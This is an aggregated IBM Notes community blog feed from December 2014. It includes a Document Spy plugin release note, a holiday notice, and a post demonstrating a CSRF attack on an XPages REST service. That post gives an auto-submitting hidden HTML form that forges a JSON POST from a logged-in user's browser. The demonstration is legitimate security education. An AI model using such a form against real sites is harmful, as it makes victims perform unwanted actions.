Außer Rand und Band

31. Dezember 2014 Posted by Alexander Kluge

Microsoft Band

Nun also das Microsoft Band.

Einen Fitness Tracker will man eigentlich immer tragen.

REST & Security: CSRF Attacks

30. Dezember 2014 Posted by Sven Hasselbach

In this post I will demonstrate how a do a CSRF attack against a XPages REST service.

Let’s assume that we have a custom REST service on a XPage. To keep the example as simple as possible, this service returns the posted data back to the requesting browser only, nothing more and nothing less:

<?xml version="1.0" encoding="UTF-8"?>
<xp:view
    xmlns:xp="http://www.ibm.com/xsp/core"
    xmlns:xe="http://www.ibm.com/xsp/coreex"
    rendered="false">

    <xe:restService
        id="restService"
        pathInfo="foo">
        <xe:this.service>
            <xe:customRestService
                requestContentType="application/json"
                requestVar="data"
                doPost="#{javascript:toJson( requestScope.data )}">
            </xe:customRestService>
        </xe:this.service>
    </xe:restService>

On my web server, I have created a simple HTML page with a form:

<html>
    <head />
    <body>
        <form name="CSRFAttack" enctype="text/plain"
            action="http://localhost/REST.nsf/CSRF.xsp/foo/" method="POST">
          <input type="hidden" name='{"Hello": "World"}'>
        </form>

        <script>document.CSRFAttack.submit();</script>
    </body>
</html>

As soon a user (which is logged on my domino server) opens the HTML page, the form is automatically posted to the REST service.

1. User opens the “bad site”

2. Then the form is sent to the server

3. And the request is processed by the REST service

Et voilà, the CSRF attack was successfull.

Enterprises are increasingly realizing that mobilizing their workforce isn’t just about giving everyone a smartphone with email access, rather it’s about building a plethora of both internally and externally facing applications – for marketing, operations, collaboration etc.

Besserer Transport für meinen 3D-Drucker

28. Dezember 2014 Posted by motzet-online.de

Documen Spy 1.1 brings bug fixes and a new edit field feature.

28. Dezember 2014 Posted by Ralf Petter

November and December were very busy month for me, so i was pretty quiet on my blog. I hope this will change again in the new year. But as a late time Christmas present, i have uploaded the new 1.1 Version of my most popular free tool "Document Spy" for IBM Notes. If you do not know the "Document Spy" you can read all the details about the functionality this plugin adds to your 8.5.x and 9.0.x Notes Standard client in my blog post "Document Spy Admins little helper".

The 1.1 version contains some bug fixes, especially a fix for a bug Jesper Kiaer has reported, that Document Spy can crash, when you select more then one document at a time. The fix is that only one document of the whole selection will be loaded in Document Spy at one time. I hope this will solve the problem of Jesper.

But the 1.1 version does not only bring bug fixes it also contain the most requested feature in the feedback i have got for Version 1.0. It is a function to make quick changes to fields in the Document Spy. I allows you to change Text, Date and Number single and multiple value fields.

Follow this simple tutorial to change the Delivered Date of an e-mail message:

Select the e-mail you want to change and the Document Spy will show all items of the selected message in the sidebar view.

Scroll to the row with the "Delivered Date" item and Double click it.

You will get a simple Dialog with the value and you can change the value to what ever you want. But be careful, because there are only basic checks whether your new value will be a valid one.

Press Ok and the new value will be saved to the document and the Document Spy view will be refreshed. If the document is open in the UI you have to reload it to see the changes. Be aware that you will produce save conflicts if you make changes in Document Spy and the UI of Notes at the same time.

If you want to change a multiple value field, the values have to be separated with a "|". You can escape "|" with a leading backslash. See the $mailer field for an example.

This item have 2 separated values "IBM Notes Release 9.0.1 FP1| April 05, 2014" and "Test" The "|" in the first value is escaped by the backslash.

This new feature will save you a lot of work that you would otherwise spend on creating temporary agents.

To install the Document spy follow the installation instructions on the Download page of the widget.

 If you can not access data on google drive i can send you the updatesite per mail

If you want report problems or give feedback please add a comment or mail me on ralfDotPetterAtgmailDotcom

Jahresendweihnachtspost.

ITWU “over and out” für 2014

23. Dezember 2014 Posted by Katrin Benteler

for the english post, please scroll down

At last, leaving the rush of these past few weeks behind it's getting quiet around the ITWU office. The last tickets of the year are finished, the desk is tidy (for the frist time in months) and the last christmas cookies are about to vanish into thin air.

Tonight, the ITWU family leaves the office one last time this year for the well deserved holiday vacation. The first busy bees are about to return on the 2nd of January though you will have to wait for the 5th of January to catch the whole bunch of us.

Those of you who cannot wait that long must simply send us an e-mail - either to our personal addresses or to info@itwu.de. We will get back to you as soon as possible!

Until then we wish you a very merry christmas and a happy and hopefully successful 2015!
